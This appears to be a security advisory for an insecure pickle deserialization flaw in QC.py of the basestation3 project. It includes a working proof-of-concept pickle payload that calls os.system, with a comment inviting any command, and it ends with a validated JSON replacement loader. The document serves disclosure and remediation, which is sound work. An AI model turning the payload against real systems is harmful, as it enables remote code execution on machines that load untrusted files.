### Key Information Summary

#### Vulnerability Description

- **Vulnerability Type**: Remote Code Execution (RCE)
- **Cause**: Insecure deserialization via `pickle.load()` in the `load_qc_pickl()` function, leading to arbitrary code execution.

#### Impact

- **Arbitrary Code Execution**
- **Remote System Compromise**: If the attacker can control `qc_file`

#### Affected Component

- **File**: QC.py
- **Function**: load_qc_pickl(qc_file)
- **Issue**: `pickle.load()` used without input validation

#### Reproduction Steps

1. Clone the repository: `git clone https://github.com/iop-api-uw/basestation3`
2. Navigate to the `basestation3` directory: `cd basestation3`
3. Create a malicious `qc.pkl` file:

   ```python
   import pickle
   import os

   class Evil:
       def __reduce__(self):
           return (os.system, ("gnome-calculator",))  # Replace with any OS command

   payload = pickle.dumps(Evil())
   with open("qc.pkl", "wb") as f:
       f.write(payload)
   ```

4. Create and run `exploit.py`:

   ```python
   from QC import load_qc_pickl

   load_qc_pickl("/root/CVE/qc.pkl")
   ```

#### Recommended Fix

- Avoid using `pickle` to load untrusted data.
- If serialization/deserialization is necessary, use secure alternatives such as `json.load()` or custom binary formats, along with proper validation.
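
The recommended fix, sketched as an added example (not code from basestation3): a JSON loader that could stand in for `load_qc_pickl()`, with validation on both the reading and the writing side. The `{variable_name: [flags]}` layout, the size cap, the flag range and the names `load_qc_json`, `save_qc_json`, `validate_qc` and `QCFormatError` are assumptions, since the page does not show the real QC data structure.

```python
import json
import os

MAX_QC_BYTES = 1_000_000  # assumed upper bound for a QC file
MAX_FLAG = 9              # assumed range of QC flag values


class QCFormatError(ValueError):
    """Raised when a QC file does not match the expected layout."""


def validate_qc(obj):
    """Accept only {variable_name: [int flag, ...]} and return a clean copy."""
    if not isinstance(obj, dict):
        raise QCFormatError("top level must be an object")
    clean = {}
    for name, flags in obj.items():
        if not isinstance(name, str) or not name.isidentifier():
            raise QCFormatError(f"bad variable name: {name!r}")
        if not isinstance(flags, list):
            raise QCFormatError(f"{name}: flags must be a list")
        for flag in flags:
            # bool is a subclass of int, so exclude it explicitly
            if isinstance(flag, bool) or not isinstance(flag, int):
                raise QCFormatError(f"{name}: non-integer flag {flag!r}")
            if not 0 <= flag <= MAX_FLAG:
                raise QCFormatError(f"{name}: flag out of range {flag!r}")
        clean[name] = list(flags)
    return clean


def load_qc_json(qc_file):
    """Parse qc_file as plain JSON data; nothing in the file is ever called."""
    if os.path.getsize(qc_file) > MAX_QC_BYTES:
        raise QCFormatError("file too large")
    with open(qc_file, "rb") as f:
        raw = f.read(MAX_QC_BYTES + 1)
    try:
        obj = json.loads(raw.decode("utf-8"))
    except (UnicodeDecodeError, json.JSONDecodeError, RecursionError) as exc:
        raise QCFormatError(f"not valid JSON: {exc!r}") from exc
    return validate_qc(obj)


def save_qc_json(qc, qc_file):
    """Producer side: validate, then write JSON instead of pickle.dump()."""
    with open(qc_file, "w", encoding="utf-8") as f:
        json.dump(validate_qc(qc), f)
```

A pickle file handed to `load_qc_json()` fails at the UTF-8/JSON decoding step and raises `QCFormatError`; its contents are never interpreted as objects.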